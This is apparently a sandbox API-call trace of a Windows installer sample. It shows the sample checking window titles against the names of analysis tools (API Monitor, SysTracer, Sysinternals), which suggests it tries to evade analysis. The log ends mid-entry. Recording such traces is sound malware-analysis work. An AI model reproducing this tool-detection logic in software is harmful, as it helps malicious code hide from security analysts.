[0158.463] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrlenA (lpString="") returned 0 [0158.463] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.463] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.463] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.463] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.463] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.464] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.464] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.464] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.464] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.464] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.464] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.464] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.464] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.464] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.464] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.464] lstrcpynA 
(in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.464] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] strstr (_Str="Task Switching", _SubStr="- main thread") returned 0x0 [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.465] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.465] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.465] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.465] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrlenA (lpString="0") returned 1 [0158.465] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x337684, 
lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.465] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.465] lstrlenA (lpString="0") returned 1 [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrlenA (lpString="Task Switching") returned 14 [0158.466] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrlenA (lpString="3399936") returned 7 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task 
Switching" [0158.466] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrlenA (lpString="") returned 0 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.466] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.466] lstrlenA (lpString="") returned 0 [0158.466] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrlenA (lpString="") returned 0 [0158.467] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40ac18, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.467] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.467] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.467] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.467] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.467] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.467] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.468] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.468] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.468] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.468] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.468] strstr (_Str="Task Switching", _SubStr="API Monitor") returned 0x0 [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.468] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.468] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.468] lstrcpyA (in: 
lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.468] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.468] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.469] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrlenA (lpString="0") returned 1 [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.469] lstrlenA (lpString="0") returned 1 [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrlenA (lpString="Task Switching") returned 14 [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software 
SysTracer" [0158.469] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrlenA (lpString="3399936") returned 7 [0158.469] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.469] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.469] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.469] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: 
lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrlenA (lpString="") returned 0 [0158.470] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.470] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.470] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.470] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.470] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.470] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.471] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.471] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.471] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.471] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.471] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.471] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.471] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") 
returned="strstr" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.471] lstrcpynA (in: lpString1=0x341200, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.471] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.471] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.471] strstr (_Str="Task Switching", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.472] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.472] lstrcpynA (in: lpString1=0x3401e0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.472] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.472] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrlenA (lpString="0") returned 1 [0158.472] lstrcpynA (in: lpString1=0x337684, 
lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.472] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.472] lstrlenA (lpString="0") returned 1 [0158.472] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.472] lstrlenA (lpString="Task Switching") returned 14 [0158.472] lstrcpynA (in: lpString1=0x33723c, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrlenA (lpString="3399936") returned 7 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x337acc, 
lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x40a418, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x432c00, lpString2="Task Switching", iMaxLength=1024 | out: lpString1="Task Switching") returned="Task Switching" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.473] lstrlenA (lpString="") returned 0 [0158.473] lstrcpynA (in: lpString1=0x337f14, lpString2="", 